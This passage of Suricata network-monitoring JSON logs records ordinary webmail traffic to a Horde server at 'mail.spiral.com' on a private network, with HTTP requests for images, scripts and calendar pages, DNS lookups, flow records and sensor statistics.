Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:36.261237+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} 
{"timestamp":"2020-02-29T00:11:36.263342+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:11:36.305361+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} {"timestamp":"2020-02-29T00:11:36.305392+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} 
{"timestamp":"2020-02-29T00:11:37.000761+0000","flow_id":826869973231761,"event_type":"flow","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":255,"bytes_toclient":141,"start":"2020-02-29T00:06:31.436369+0000","end":"2020-02-29T00:06:36.553564+0000","age":5,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:37.019053+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34796,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31912,"tx_id":0}} {"timestamp":"2020-02-29T00:11:38.244392+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36850,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:38.920615+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:11:39.182692+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.193045+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19489,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:39.300002+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34798,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37765,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} 
{"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.380794+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.390757+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39025,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.525557+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5490,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.535760+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":3}} 
{"timestamp":"2020-02-29T00:11:39.536000+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:11:39.535374+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":5}} {"timestamp":"2020-02-29T00:11:39.535761+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} 
{"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} 
{"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:11:40.136642+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19706,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:40.356634+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018}} {"timestamp":"2020-02-29T00:11:41.000189+0000","event_type":"stats","stats":{"uptime":14353,"capture":{"kernel_packets":134731,"kernel_drops":0},"decoder":{"pkts":134769,"bytes":92953515,"invalid":185,"ipv4":133284,"ipv6":8,"ethernet":134769,"raw":0,"null":0,"sll":0,"tcp":128038,"udp":5046,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2750,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2766,"synack":2757,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_m
emuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1791,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2304,"failed_udp":111},"tx":{"http":4609,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2383}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2352,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22816,"memcap_state":0,"memcap_global":0},"http":{"memuse":200557,"memcap":0}}} {"timestamp":"2020-02-29T00:11:42.000260+0000","flow_id":157748428880946,"event_type":"flow","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:06:41.867378+0000","end":"2020-02-29T00:06:41.975863+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:42.767232+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17983,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:42.798805+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":6}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:42.947886+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710}} 
{"timestamp":"2020-02-29T00:11:43.000367+0000","flow_id":446408885986074,"event_type":"flow","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:42.582426+0000","end":"2020-02-29T00:06:42.690395+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:43.012531+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23757,"tx_id":7}} {"timestamp":"2020-02-29T00:11:43.014870+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} 
{"timestamp":"2020-02-29T00:11:43.015159+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:11:43.017305+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:11:43.047974+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":8}} {"timestamp":"2020-02-29T00:11:43.048269+0000","flow_id":1202052566297535,"event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} 